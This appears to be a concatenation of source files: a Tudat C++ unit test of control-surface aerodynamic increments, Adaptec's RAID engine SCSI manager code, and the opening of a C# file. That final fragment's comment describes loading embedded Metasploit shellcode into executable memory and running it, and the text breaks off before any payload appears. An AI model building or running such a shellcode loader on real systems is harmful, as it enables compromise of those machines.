    std::shared_ptr< AerodynamicCoefficientInterface > coefficientInterfaceWithoutIncrements =
            getApolloCoefficientInterface( );

    // Create aerodynamic coefficient interface with control increments.
    std::shared_ptr< AerodynamicCoefficientInterface > coefficientInterfaceWithIncrements =
            getApolloCoefficientInterface( );
    std::shared_ptr< ControlSurfaceIncrementAerodynamicInterface > controlSurfaceInterface =
            std::make_shared< CustomControlSurfaceIncrementAerodynamicInterface >(
                &dummyControlIncrements,
                std::vector< AerodynamicCoefficientsIndependentVariables >{ angle_of_attack_dependent, control_surface_deflection_dependent } );
    std::map< std::string, std::shared_ptr< ControlSurfaceIncrementAerodynamicInterface > > controlSurfaceList;
    controlSurfaceList[ "TestSurface" ] = controlSurfaceInterface;
    coefficientInterfaceWithIncrements->setControlSurfaceIncrements( controlSurfaceList );

    // Define values of independent variables of body aerodynamics
    // (Mach number, angle of attack, sideslip; entries 1-2 overwritten below).
    std::vector< double > independentVariables;
    independentVariables.push_back( 10.0 );
    independentVariables.push_back( 0.1 );
    independentVariables.push_back( -0.01 );

    // Define values of independent variables of control surface aerodynamics
    // (angle of attack, surface deflection; overwritten in the loops below).
    std::map< std::string, std::vector< double > > controlSurfaceIndependentVariables;
    controlSurfaceIndependentVariables[ "TestSurface" ].push_back( 0.1 );
    controlSurfaceIndependentVariables[ "TestSurface" ].push_back( 0.0 );

    // Declare test variables.
    Eigen::Vector3d forceWithIncrement, forceWithoutIncrement;
    Eigen::Vector3d momentWithIncrement, momentWithoutIncrement;
    Eigen::Vector6d manualControlIncrements;

    // Test coefficient interfaces for range of independent variables.
    for( double angleOfAttack = -0.4; angleOfAttack < 0.4; angleOfAttack += 0.02 )
    {
        for( double deflectionAngle = -0.05; deflectionAngle < 0.05; deflectionAngle += 0.001 )
        {
            // Set indepdnent variables.
            controlSurfaceIndependentVariables[ "TestSurface" ][ 0 ] = angleOfAttack;
            controlSurfaceIndependentVariables[ "TestSurface" ][ 1 ] = deflectionAngle;
            independentVariables[ 1 ] = angleOfAttack;

            // Update coefficients. Note: both interfaces must be updated before
            // retrieval, since retrieval returns the last-updated state.
            coefficientInterfaceWithoutIncrements->updateFullCurrentCoefficients(
                        independentVariables );
            coefficientInterfaceWithIncrements->updateFullCurrentCoefficients(
                        independentVariables, controlSurfaceIndependentVariables );

            // Retrieve coefficients.
            forceWithIncrement = coefficientInterfaceWithIncrements->getCurrentForceCoefficients( );
            forceWithoutIncrement = coefficientInterfaceWithoutIncrements->getCurrentForceCoefficients( );

            momentWithIncrement = coefficientInterfaceWithIncrements->getCurrentMomentCoefficients( );
            momentWithoutIncrement = coefficientInterfaceWithoutIncrements->getCurrentMomentCoefficients( );

            // Test coefficients: entries 0-2 of the dummy increment are force
            // increments, entries 3-5 are moment increments.
            manualControlIncrements = dummyControlIncrements( controlSurfaceIndependentVariables[ "TestSurface" ] );
            for( unsigned int i = 0; i < 3; i++ )
            {
                BOOST_CHECK_SMALL( std::fabs( forceWithIncrement( i ) -
                                              forceWithoutIncrement( i ) - manualControlIncrements( i ) ), 1.0E-14 );
                BOOST_CHECK_SMALL( std::fabs( momentWithIncrement( i ) -
                                              momentWithoutIncrement( i ) - manualControlIncrements( i + 3 ) ), 1.0E-14 );
            }
        }
    }
}
//! Test use of control surface deflections in a full numerical propagation, with a dummy (e.g. non-physical) model
//! for aerodynamic and control surface guidance. Test case uses Apollo capsule entry and coefficients.
//! Strategy: propagate an Apollo entry trajectory while DummyGuidanceSystem drives
//! the angle of attack and "TestSurface" deflection as linear functions of time,
//! then verify the saved dependent variables (angles, deflection, coefficients)
//! against values recomputed directly from the coefficient interface.
BOOST_AUTO_TEST_CASE( testControlSurfaceIncrementInterfaceInPropagation )
{
    using namespace tudat;
    using namespace ephemerides;
    using namespace interpolators;
    using namespace numerical_integrators;
    using namespace spice_interface;
    using namespace simulation_setup;
    using namespace basic_astrodynamics;
    using namespace orbital_element_conversions;
    using namespace propagators;
    using namespace aerodynamics;
    using namespace basic_mathematics;
    using namespace input_output;

    // Load Spice kernels.
    spice_interface::loadStandardSpiceKernels( );

    // Set simulation start epoch.
    const double simulationStartEpoch = 0.0;

    // Set simulation end epoch.
    const double simulationEndEpoch = 3300.0;

    // Set numerical integration fixed step size.
    const double fixedStepSize = 1.0;

    // Set initial Keplerian elements for vehicle (low-perigee entry orbit).
    Vector6d apolloInitialStateInKeplerianElements;
    apolloInitialStateInKeplerianElements( semiMajorAxisIndex ) = spice_interface::getAverageRadius( "Earth" ) + 120.0E3;
    apolloInitialStateInKeplerianElements( eccentricityIndex ) = 0.005;
    apolloInitialStateInKeplerianElements( inclinationIndex ) = unit_conversions::convertDegreesToRadians( 85.3 );
    apolloInitialStateInKeplerianElements( argumentOfPeriapsisIndex )
            = unit_conversions::convertDegreesToRadians( 235.7 );
    apolloInitialStateInKeplerianElements( longitudeOfAscendingNodeIndex )
            = unit_conversions::convertDegreesToRadians( 23.4 );
    apolloInitialStateInKeplerianElements( trueAnomalyIndex ) = unit_conversions::convertDegreesToRadians( 139.87 );

    // Convert apollo state from Keplerian elements to Cartesian elements.
    const Vector6d apolloInitialState = convertKeplerianToCartesianElements(
                apolloInitialStateInKeplerianElements,
                getBodyGravitationalParameter( "Earth" ) );

    // Define simulation body settings (buffered a few steps past the
    // propagation interval so interpolated ephemerides stay valid).
    std::map< std::string, std::shared_ptr< BodySettings > > bodySettings =
            getDefaultBodySettings( { "Earth", "Moon" }, simulationStartEpoch - 10.0 * fixedStepSize,
                                    simulationEndEpoch + 10.0 * fixedStepSize );
    bodySettings[ "Earth" ]->gravityFieldSettings =
            std::make_shared< simulation_setup::GravityFieldSettings >( central_spice );

    // Create Earth object
    simulation_setup::NamedBodyMap bodyMap = simulation_setup::createBodies( bodySettings );

    // Create vehicle objects.
    bodyMap[ "Apollo" ] = std::make_shared< simulation_setup::Body >( );

    // Create vehicle aerodynamic coefficients, and attach the dummy control
    // surface increments under the name "TestSurface".
    bodyMap[ "Apollo" ]->setAerodynamicCoefficientInterface(
                unit_tests::getApolloCoefficientInterface( ) );
    std::shared_ptr< ControlSurfaceIncrementAerodynamicInterface > controlSurfaceInterface =
            std::make_shared< CustomControlSurfaceIncrementAerodynamicInterface >(
                &dummyControlIncrements,
                std::vector< AerodynamicCoefficientsIndependentVariables >{ angle_of_attack_dependent, control_surface_deflection_dependent } );
    std::map< std::string, std::shared_ptr< ControlSurfaceIncrementAerodynamicInterface > > controlSurfaceList;
    controlSurfaceList[ "TestSurface" ] = controlSurfaceInterface;
    bodyMap[ "Apollo" ]->getAerodynamicCoefficientInterface( )->setControlSurfaceIncrements( controlSurfaceList );

    bodyMap[ "Apollo" ]->setConstantBodyMass( 5.0E3 );
    bodyMap[ "Apollo" ]->setEphemeris(
                std::make_shared< ephemerides::TabulatedCartesianEphemeris< > >(
                    std::shared_ptr< interpolators::OneDimensionalInterpolator< double, Eigen::Vector6d > >( ),
                    "Earth" ) );
    std::shared_ptr< system_models::VehicleSystems > apolloSystems = std::make_shared< system_models::VehicleSystems >( );
    bodyMap[ "Apollo" ]->setVehicleSystems( apolloSystems );

    // Finalize body creation.
    setGlobalFrameBodyEphemerides( bodyMap, "SSB", "ECLIPJ2000" );

    // Define propagator settings variables.
    SelectedAccelerationMap accelerationMap;
    std::vector< std::string > bodiesToPropagate;
    std::vector< std::string > centralBodies;

    // Define acceleration model settings.
    std::map< std::string, std::vector< std::shared_ptr< AccelerationSettings > > > accelerationsOfApollo;
    accelerationsOfApollo[ "Earth" ].push_back( std::make_shared< AccelerationSettings >( central_gravity ) );
    accelerationsOfApollo[ "Earth" ].push_back( std::make_shared< AccelerationSettings >( aerodynamic ) );
    accelerationsOfApollo[ "Moon" ].push_back( std::make_shared< AccelerationSettings >( central_gravity ) );
    accelerationMap[ "Apollo" ] = accelerationsOfApollo;

    bodiesToPropagate.push_back( "Apollo" );
    centralBodies.push_back( "Earth" );

    // Set initial state
    Eigen::Vector6d systemInitialState = apolloInitialState;

    // Define list of dependent variables to save. The order here fixes the
    // entry layout checked in the verification loop at the bottom.
    std::vector< std::shared_ptr< SingleDependentVariableSaveSettings > > dependentVariables;
    dependentVariables.push_back(
                std::make_shared< SingleDependentVariableSaveSettings >(
                    mach_number_dependent_variable, "Apollo" ) );
    dependentVariables.push_back(
                std::make_shared< BodyAerodynamicAngleVariableSaveSettings >(
                    "Apollo", reference_frames::angle_of_attack ) );
    dependentVariables.push_back(
                std::make_shared< BodyAerodynamicAngleVariableSaveSettings >(
                    "Apollo", reference_frames::angle_of_sideslip ) );
    dependentVariables.push_back(
                std::make_shared< SingleDependentVariableSaveSettings >(
                    control_surface_deflection_dependent_variable, "Apollo", "TestSurface" ) );
    dependentVariables.push_back(
                std::make_shared< SingleDependentVariableSaveSettings >(
                    aerodynamic_moment_coefficients_dependent_variable, "Apollo" ) );
    dependentVariables.push_back(
                std::make_shared< SingleDependentVariableSaveSettings >(
                    aerodynamic_force_coefficients_dependent_variable, "Apollo" ) );

    // Create acceleration models
    basic_astrodynamics::AccelerationMap accelerationModelMap = createAccelerationModelsMap(
                bodyMap, accelerationMap, bodiesToPropagate, centralBodies );

    // Set update function for body orientation and control surface deflections
    // (the guidance object registers itself with the angle calculator).
    std::shared_ptr< DummyGuidanceSystem > dummyGuidanceSystem = std::make_shared< DummyGuidanceSystem >(
                std::bind( &system_models::VehicleSystems::setCurrentControlSurfaceDeflection, apolloSystems, std::placeholders::_1, std::placeholders::_2 ),
                bodyMap[ "Apollo" ]->getFlightConditions( )->getAerodynamicAngleCalculator( ) );

    // Create propagation and integrtion settings.
    std::shared_ptr< TranslationalStatePropagatorSettings< double > > propagatorSettings =
            std::make_shared< TranslationalStatePropagatorSettings< double > >
            ( centralBodies, accelerationModelMap, bodiesToPropagate, systemInitialState,
              std::make_shared< propagators::PropagationTimeTerminationSettings >( 1000.0 ), cowell,
              std::make_shared< DependentVariableSaveSettings >( dependentVariables ) );
    std::shared_ptr< IntegratorSettings< > > integratorSettings =
            std::make_shared< IntegratorSettings< > >
            ( rungeKutta4, simulationStartEpoch, fixedStepSize );

    // Create simulation object and propagate dynamics.
    SingleArcDynamicsSimulator< > dynamicsSimulator(
                bodyMap, integratorSettings, propagatorSettings, true, false, false );

    // Retrieve numerical solutions for state and dependent variables
    std::map< double, Eigen::Matrix< double, Eigen::Dynamic, 1 > > numericalSolution =
            dynamicsSimulator.getEquationsOfMotionNumericalSolution( );
    std::map< double, Eigen::VectorXd > dependentVariableSolution =
            dynamicsSimulator.getDependentVariableHistory( );

    // Declare test variables.
    double currentAngleOfAttack, currentSideslipAngle, currentMachNumber, currentSurfaceDeflection, currentTime;
    Eigen::Vector3d currentForceCoefficients, currentMomentCoefficients;
    Eigen::Vector3d expectedForceCoefficients, expectedMomentCoefficients;

    std::vector< double > currentAerodynamicsIndependentVariables;
    currentAerodynamicsIndependentVariables.resize( 3 );

    std::map< std::string, std::vector< double > > currentAerodynamicsControlIndependentVariables;
    currentAerodynamicsControlIndependentVariables[ "TestSurface" ].resize( 2 );

    // Iterate over saved variables and compare to expected values
    std::shared_ptr< AerodynamicCoefficientInterface > coefficientInterface =
            bodyMap[ "Apollo" ]->getAerodynamicCoefficientInterface( );
    for( std::map< double, Eigen::VectorXd >::iterator variableIterator = dependentVariableSolution.begin( );
         variableIterator != dependentVariableSolution.end( ); variableIterator++ )
    {
        // Retrieve dependent variables (layout matches the save-settings order
        // defined above: Mach, AoA, sideslip, deflection, moments 4-6, forces 7-9).
        currentTime = variableIterator->first;
        currentMachNumber = variableIterator->second( 0 );
        currentAngleOfAttack = variableIterator->second( 1 );
        currentSideslipAngle = variableIterator->second( 2 );
        currentSurfaceDeflection = variableIterator->second( 3 );
        currentMomentCoefficients = variableIterator->second.segment( 4, 3 );
        currentForceCoefficients = variableIterator->second.segment( 7, 3 );

        // Test angles of attack and sideslip, and control surface deflection,
        // against the linear-in-time profiles imposed by DummyGuidanceSystem.
        BOOST_CHECK_SMALL( std::fabs( currentAngleOfAttack - 0.3 * ( 1.0 - currentTime / 1000.0 ) ), 1.0E-14 );
        BOOST_CHECK_SMALL( std::fabs( currentSideslipAngle ), 1.0E-14 );
        BOOST_CHECK_SMALL( std::fabs( currentSurfaceDeflection - ( -0.02 + 0.04 * currentTime / 1000.0 ) ), 1.0E-14 );

        // Set current aerodynamic coefficient independent variables and retrieve coefficients.c.
        currentAerodynamicsIndependentVariables[ 0 ] = currentMachNumber;
        currentAerodynamicsIndependentVariables[ 1 ] = currentAngleOfAttack;
        currentAerodynamicsIndependentVariables[ 2 ] = currentSideslipAngle;

        currentAerodynamicsControlIndependentVariables[ "TestSurface" ][ 0 ] = currentAngleOfAttack;
        currentAerodynamicsControlIndependentVariables[ "TestSurface" ][ 1 ] = currentSurfaceDeflection;

        coefficientInterface->updateFullCurrentCoefficients(
                    currentAerodynamicsIndependentVariables, currentAerodynamicsControlIndependentVariables );

        expectedForceCoefficients = coefficientInterface->getCurrentForceCoefficients( );
        expectedMomentCoefficients = coefficientInterface->getCurrentMomentCoefficients( );

        // Test expected against actual aerodynamic coefficients.
        for( unsigned int i = 0; i < 3; i++ )
        {
            BOOST_CHECK_SMALL( std::fabs( expectedForceCoefficients( i ) - currentForceCoefficients( i ) ), 1.0E-14 );
            BOOST_CHECK_SMALL( std::fabs( expectedMomentCoefficients( i ) - currentMomentCoefficients( i ) ), 1.0E-14 );
        }
    }
}
BOOST_AUTO_TEST_SUITE_END( )
} // namespace unit_tests
} // namespace tudat
| DominicDirkx/tudat | Tudat/Astrodynamics/Aerodynamics/UnitTests/unitTestControlSurfaceIncrements.cpp | C++ | bsd-3-clause | 19,487 |
/* Copyright (c) 1996-2004, Adaptec Corporation
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions are met:
*
* - Redistributions of source code must retain the above copyright notice, this
* list of conditions and the following disclaimer.
* - Redistributions in binary form must reproduce the above copyright notice,
* this list of conditions and the following disclaimer in the documentation
* and/or other materials provided with the distribution.
* - Neither the name of the Adaptec Corporation nor the names of its
* contributors may be used to endorse or promote products derived from this
* software without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
* AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
* LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
* CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
* SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
* INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
* CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
* ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
* POSSIBILITY OF SUCH DAMAGE.
*/
//File - SCSI_MGR.CPP
//***************************************************************************
//
//Description:
//
// This file contains the function definitions for the dptSCSImgr_C
//class.
//
//Author: Doug Anderson
//Date: 3/9/93
//
//Editors:
//
//Remarks:
//
//
//***************************************************************************
//Include Files -------------------------------------------------------------
#include "allfiles.hpp" // All engine include files
//Function - dptSCSImgr_C::dptSCSImgr_C() - start
//===========================================================================
//
//Description:
//
// This function is the constructor for the dptSCSImgr_C class.
//
//Parameters:
//
//Return Value:
//
//Global Variables Affected:
//
//Remarks: (Side effects, Assumptions, Warnings...)
//
//
//---------------------------------------------------------------------------
dptSCSImgr_C::dptSCSImgr_C()
{
    // RAID capabilities are unknown until detected
    raidSupport   = 0;
    // No miscellaneous RAID rebuild flags set initially
    raidFlags     = 0;

    // Rebuild pacing defaults: interval of 90 (original comment: "every
    // second"), 256k transferred per burst (stored as 256 * 2), and no
    // polling for rebuild progress (0 = disabled)
    rbldFrequency = 90;
    rbldAmount    = 256 * 2;
    rbldPollFreq  = 0;

    // Wait 6 seconds before spinning down a failed drive
    spinDownDelay = 6;
}
//dptSCSImgr_C::dptSCSImgr_C() - end
//Function - dptSCSImgr_C::preEnterLog() - start
//===========================================================================
//
//Description:
//
// This function is called prior to entering a device in this manager's
//logical device list. This function should be used to set any ownership
//flags...
//
//Parameters:
//
//Return Value:
//
//Global Variables Affected:
//
//Remarks: (Side effects, Assumptions, Warnings...)
//
//
//---------------------------------------------------------------------------
DPT_RTN_T dptSCSImgr_C::preEnterLog(dptCoreDev_C *dev_P)
{
    // Adopt the device: point it at this manager's HBA and refresh its
    // cached HBA number before it is entered in the logical device list.
    dev_P->hba_P = myHBA_P();
    dev_P->updateHBAnum();

    // The historical SCSI address uniqueness check is intentionally
    // disabled, so entry is always accepted.
    return (MSG_RTN_COMPLETED);
}
//dptSCSImgr_C::preEnterLog() - end
//Function - dptSCSImgr_C::preEnterPhy() - start
//===========================================================================
//
//Description:
//
// This function is called prior to entering an object in this manager's
//physical object list. This function should be used to set any ownership
//flags...
//
//Parameters:
//
//Return Value:
//
//Global Variables Affected:
//
//Remarks: (Side effects, Assumptions, Warnings...)
//
//
//---------------------------------------------------------------------------
DPT_RTN_T dptSCSImgr_C::preEnterPhy(dptCoreObj_C *obj_P)
{
    // The core object is always a SCSI object at this level
    dptSCSIobj_C *scsiObj_P = (dptSCSIobj_C *) obj_P;

    // Adopt the object: point it at this manager's HBA and refresh its
    // cached HBA number before it is entered in the physical object list.
    scsiObj_P->hba_P = myHBA_P();
    scsiObj_P->updateHBAnum();

    // The historical address-bounds and SCSI ID conflict checks on the
    // object's address are intentionally disabled, so entry is always
    // accepted.
    return (MSG_RTN_COMPLETED);
}
//dptSCSImgr_C::preEnterPhy() - end
//Function - dptSCSImgr_C::preAddLog() - start
//===========================================================================
//
//Description:
//
// This function is called prior to adding a device to this manager's
//logical device list. This function insures that the device has a
//unique SCSI address and positions the logical device list to enter
//the device in SCSI address order.
//
//Parameters:
//
//Return Value:
//
//Global Variables Affected:
//
//Remarks: (Side effects, Assumptions, Warnings...)
//
//
//---------------------------------------------------------------------------
uSHORT dptSCSImgr_C::preAddLog(dptCoreDev_C *dev_P)
{
    // Position the logical device list at the SCSI-address-ordered
    // insertion point; the return value indicates address uniqueness.
    return (positionSCSI(logList,dev_P->getAddr()));
}
//dptSCSImgr_C::preAddLog() - end
//Function - dptSCSImgr_C::preAddPhy() - start
//===========================================================================
//
//Description:
//
// This function is called prior to adding an object to this manager's
//physical device list. This function insures that the device has a
//unique SCSI address and positions the physical object list to enter
//the object in SCSI address order.
//
//Parameters:
//
//Return Value:
//
//Global Variables Affected:
//
//Remarks: (Side effects, Assumptions, Warnings...)
//
//
//---------------------------------------------------------------------------
uSHORT dptSCSImgr_C::preAddPhy(dptCoreObj_C *obj_P)
{
    // Position the physical object list at the SCSI-address-ordered
    // insertion point; the return value indicates address uniqueness.
    return (positionSCSI(phyList,((dptSCSIobj_C *)obj_P)->getAddr()));
}
//dptSCSImgr_C::preAddPhy() - end
//Function - dptSCSImgr_C::getNextAddr() - start
//===========================================================================
//
//Description:
//
// This function attempts to find the next available address in the
//specified list. The entire physical address range is checked.
//
//Parameters:
//
//Return Value:
//
//Global Variables Affected:
//
//Remarks: (Side effects, Assumptions, Warnings...)
//
//
//---------------------------------------------------------------------------
// Searches the entire physical address range (top down) for a SCSI address
// that is not already used in the specified list.
//   list    = device/object list the candidate addresses are tested against
//   inAddr  = (output) receives the free address found; if none was free it
//             is set to the range's minimum address as a deterministic
//             fallback
//   mask    = address-compare mask forwarded to isUniqueAddr()
//   notMyID = when non-zero, this manager's own SCSI ID is excluded
// Returns 1 if a unique address was found, 0 otherwise.
uSHORT dptSCSImgr_C::getNextAddr(dptCoreList_C &list,
                                 dptAddr_S &inAddr,
                                 uCHAR mask,
                                 uCHAR notMyID
                                )
{
    uSHORT found = 0;

    // phyRange is stateful: reset() rewinds it and incTopDown() advances it
    // in the for-header, so the loop visits every address exactly once.
    for (phyRange.reset();!phyRange.maxedOut() && !found;
         phyRange.incTopDown()) {
        // Set the SCSI address
        inAddr = phyRange.cur();
        inAddr.hba = getHBA();
        // If the address is unique...
        if (isUniqueAddr(list,inAddr,mask))
            // ...and not this manager's own ID (when that filter is on)
            if (!notMyID || (inAddr.id!=getMgrPhyID()))
                found = 1;
    } // end for (phyRange)

    // If a unique address was not found...
    if (!found) {
        // Set the address to the minimum address ('found'==0 still
        // signals the failure to the caller)
        inAddr = phyRange.getMinAddr();
        inAddr.hba = getHBA();
    }

    return (found);
}
//dptSCSImgr_C::getAddr() - end
//Function - dptSCSImgr_C::createArtificial() - start
//===========================================================================
//
//Description:
//
// This function creates an absent object and enters the object into
//the engine core.
//
//Parameters:
//
//Return Value:
//
//Global Variables Affected:
//
//Remarks: (Side effects, Assumptions, Warnings...)
//
//
//---------------------------------------------------------------------------
// Creates an "artificial" (absent) object from caller-supplied data and
// enters it into this manager's list.
// Input buffer layout: DPT_TAG_T (skipped), uSHORT object type, then the
// object's full setInfo() image.  On success the new object's ID is
// written to fromEng_P.
// Returns the returnID() status on success,
//         MSG_RTN_DATA_UNDERFLOW if the object type could not be read,
//         MSG_RTN_FAILED|ERR_NEW_ARTIFICIAL on any creation failure.
DPT_RTN_T dptSCSImgr_C::createArtificial(dptBuffer_S *fromEng_P,
                                         dptBuffer_S *toEng_P
                                        )
{
    DPT_RTN_T retVal = MSG_RTN_DATA_UNDERFLOW;
    uSHORT objType;
    dptSCSIobj_C *obj_P;

    // Skip the tag field
    toEng_P->skip(sizeof(DPT_TAG_T));
    // Read the object type
    if (toEng_P->extract(&objType,sizeof(uSHORT))) {
        retVal = MSG_RTN_FAILED | ERR_NEW_ARTIFICIAL;
        if (isValidAbsentObj(objType)) {
            // Create a new object
            obj_P = (dptSCSIobj_C *) newObject(objType);
            if (obj_P != NULL) {
                // Reset the input buffer so setInfo() sees the data from
                // the beginning (including the tag/type just consumed)
                toEng_P->replay();
                // Attempt to set the object's data
                obj_P->setInfo(toEng_P,1);
                // Flag the object as artificial
                obj_P->status.flags |= FLG_STAT_ARTIFICIAL;
                // Add the object to this manager's list
                if (enterAbs(obj_P)==MSG_RTN_COMPLETED)
                    // Return the new object's ID
                    retVal = obj_P->returnID(fromEng_P);
            }
        }
    }

    return (retVal);
}
//dptSCSImgr_C::createArtificial() - end
//Function - dptSCSImgr_C::setInfo() - start
//===========================================================================
//
//Description:
//
// This function sets SCSI manager information from the specified
//input buffer.
//
//Parameters:
//
//Return Value:
//
//Global Variables Affected:
//
//Remarks: (Side effects, Assumptions, Warnings...)
//
//
//---------------------------------------------------------------------------
// Restores SCSI manager settings from the serialized image produced by
// rtnInfo().  The field order here must stay in lock-step with rtnInfo().
//   toEng_P = input buffer positioned at the start of this object's data
//   setAll  = non-zero to apply the RAID/rebuild settings; zero to merely
//             consume them so the buffer position stays correct
// Returns MSG_RTN_COMPLETED on success, MSG_RTN_DATA_UNDERFLOW if the
// buffer ran out (only the final field's skip/extract is checked).
DPT_RTN_T dptSCSImgr_C::setInfo(dptBuffer_S *toEng_P,uSHORT setAll)
{
    DPT_RTN_T retVal = MSG_RTN_DATA_UNDERFLOW;

    // Set base class information
    dptSCSIobj_C::setInfo(toEng_P,setAll);

    // The physical address range is not settable from the buffer:
    // Skip the maximum physical address supported
    toEng_P->skip(sizeof(dptAddr_S));
    // Skip the minimum physical address supported
    toEng_P->skip(sizeof(dptAddr_S));

    if (!setAll) {
        // Read-only mode: consume the remaining fields without applying them
        // Skip the rebuild frequency
        toEng_P->skip(sizeof(uSHORT));
        // Skip the rebuild amount
        toEng_P->skip(sizeof(uSHORT));
        // Skip the RAID support flags
        toEng_P->skip(sizeof(uSHORT));
        // Skip the polling interval for RAID rebuilds
        toEng_P->skip(sizeof(uSHORT));
        // Skip the miscellaneous RAID flags
        toEng_P->skip(sizeof(uSHORT));
        // Skip the spinDownTime
        if (toEng_P->skip(sizeof(uSHORT)))
            retVal = MSG_RTN_COMPLETED;
    }
    else {
        // Set the rebuild frequency
        toEng_P->extract(rbldFrequency);
        // Set the rebuild amount
        toEng_P->extract(rbldAmount);
        // Set the RAID support flags
        toEng_P->extract(raidSupport);
        // Set the polling interval for RAID rebuilds
        toEng_P->extract(rbldPollFreq);
        // Set the miscellaneous RAID flags
        toEng_P->extract(raidFlags);
        // Set the spinDownTime
        if (toEng_P->extract(spinDownDelay))
            retVal = MSG_RTN_COMPLETED;
    }

    return (retVal);
}
//dptSCSImgr_C::setInfo() - end
//Function - dptSCSImgr_C::rtnInfo() - start
//===========================================================================
//
//Description:
//
// This function returns SCSI manager information to the specified
//output buffer.
//
//Parameters:
//
//Return Value:
//
//Global Variables Affected:
//
//Remarks: (Side effects, Assumptions, Warnings...)
//
//
//---------------------------------------------------------------------------
// Serializes this manager's settings into fromEng_P, in the exact field
// order expected by setInfo().
// Returns MSG_RTN_COMPLETED if everything fit, MSG_RTN_DATA_OVERFLOW if
// the output buffer filled up (only the final insert is checked).
DPT_RTN_T dptSCSImgr_C::rtnInfo(dptBuffer_S *fromEng_P)
{
    DPT_RTN_T retVal = MSG_RTN_DATA_OVERFLOW;

    // Return base class information
    dptSCSIobj_C::rtnInfo(fromEng_P);

    // Return the maximum physical address supported
    fromEng_P->insert((void *)&phyRange.getMaxAddr(),sizeof(dptAddr_S));
    // Return the minimum physical address supported
    fromEng_P->insert((void *)&phyRange.getMinAddr(),sizeof(dptAddr_S));
    // Return the rebuild freqency
    fromEng_P->insert(rbldFrequency);
    // Return the rebuild amount
    fromEng_P->insert(rbldAmount);
    // Return the RAID type support flags
    fromEng_P->insert(raidSupport);
    // Return the polling interval to check for rebuilds
    fromEng_P->insert(rbldPollFreq);

    // Refresh the partition-zap bit from the current connection setting
    // before serializing the flags.
    // If partition table zapping is enabled
    if (myConn_P()->isPartZap())
        raidFlags &= ~FLG_PART_ZAP_DISABLED;
    else
        raidFlags |= FLG_PART_ZAP_DISABLED;

    // Return the miscellaneous RAID flags
    fromEng_P->insert(raidFlags);
    // Return the failed drive spin down delay time
    if (fromEng_P->insert(spinDownDelay))
        retVal = MSG_RTN_COMPLETED;

    return (retVal);
}
//dptSCSImgr_C::rtnInfo() - end
//Function - dptSCSImgr_C::isValidAbsentObj() - start
//===========================================================================
//
//Description:
//
// This function determines if an artificial engine object of the
//specified type can be added to this manager's device list.
//
//Parameters:
//
//Return Value:
//
//Global Variables Affected:
//
//Remarks: (Side effects, Assumptions, Warnings...)
//
//
//---------------------------------------------------------------------------
uSHORT dptSCSImgr_C::isValidAbsentObj(uSHORT objType)
{
    // Only plain SCSI device types (0x00..0xff) may be created as
    // artificial (absent) objects under this manager.
    return ((objType <= 0xff) ? 1 : 0);
}
//dptSCSImgr_C::isValidAbsentObj() - end
//Function - dptSCSImgr_C::handleMessage() - start
//===========================================================================
//
//Description:
//
// This routine handles DPT events for the dptSCSImgr_C class.
//
//Parameters:
//
//Return Value:
//
//Global Variables Affected:
//
//Remarks: (Side effects, Assumptions, Warnings...)
//
//
//---------------------------------------------------------------------------
// Dispatches engine messages addressed to this SCSI manager.  Any message
// not handled here falls through to the dptObject_C base class handler.
// Returns the handler's status, or MSG_RTN_IGNORED semantics via the base
// class for unknown messages.
DPT_RTN_T dptSCSImgr_C::handleMessage(DPT_MSG_T message,
                                      dptBuffer_S *fromEng_P,
                                      dptBuffer_S *toEng_P
                                     )
{
    DPT_RTN_T retVal = MSG_RTN_IGNORED;

    switch (message) {

        // Return object IDs from this manager's physical object list
        case MSG_ID_PHYSICALS:
            retVal = rtnIDfromList(phyList,fromEng_P,toEng_P,0);
            break;

        // Return object IDs from this manager's physical object list
        // and any sub-manager's logical device lists
        case MSG_ID_VISIBLES:
            retVal = rtnIDfromList(phyList,fromEng_P,toEng_P,OPT_TRAVERSE_LOG);
            break;

        // Return object IDs from this manager's physical object list
        // and any sub-manager's physical object lists
        case MSG_ID_ALL_PHYSICALS:
            retVal = rtnIDfromList(phyList,fromEng_P,toEng_P,OPT_TRAVERSE_PHY);
            break;

        // Return object IDs from this manager's logical device list
        case MSG_ID_LOGICALS:
            retVal = rtnIDfromList(logList,fromEng_P,toEng_P,0);
            break;

        // Create a new absent object
        case MSG_ABS_NEW_OBJECT:
            retVal = createArtificial(fromEng_P,toEng_P);
            break;

        default:
            // Call base class event handler
            retVal = dptObject_C::handleMessage(message,fromEng_P,toEng_P);
            break;

    } // end switch

    return (retVal);
}
//dptSCSImgr_C::handleMessage() - end
//Function - dptSCSImgr_C::newConfigPhy() - start
//===========================================================================
//
//Description:
//
// This function attempts to create a new physical object from
//the specified configuration data.
//
//Parameters:
//
//Return Value:
//
//Global Variables Affected:
//
//Remarks: (Side effects, Assumptions, Warnings...)
//
//
//---------------------------------------------------------------------------
void dptSCSImgr_C::newConfigPhy(uSHORT objType,dptBuffer_S *toEng_P)
{
    // Instantiate an object of the requested type; bail out quietly if the
    // type is unsupported or creation failed.
    dptObject_C *newObj_P = (dptObject_C *) newObject(objType);
    if (newObj_P == NULL)
        return;

    // Initialize the object from the configuration data and enter it in
    // this manager's physical object list.
    newObj_P->setInfo(toEng_P,1);
    enterPhy(newObj_P);
}
//dptSCSImgr_C::newConfigPhy() - end
| barak/raidutils | raideng/scsi_mgr.cpp | C++ | bsd-3-clause | 15,972 |
using System;
using System.Runtime.InteropServices;
namespace ch12_crossplatform_metasploit_payloads
{
// Selects an embedded Metasploit shellcode payload matching the host
// platform (Windows vs. Unix-like) and the process pointer width
// (x86 vs. x64), copies it into executable memory, and jumps into it via
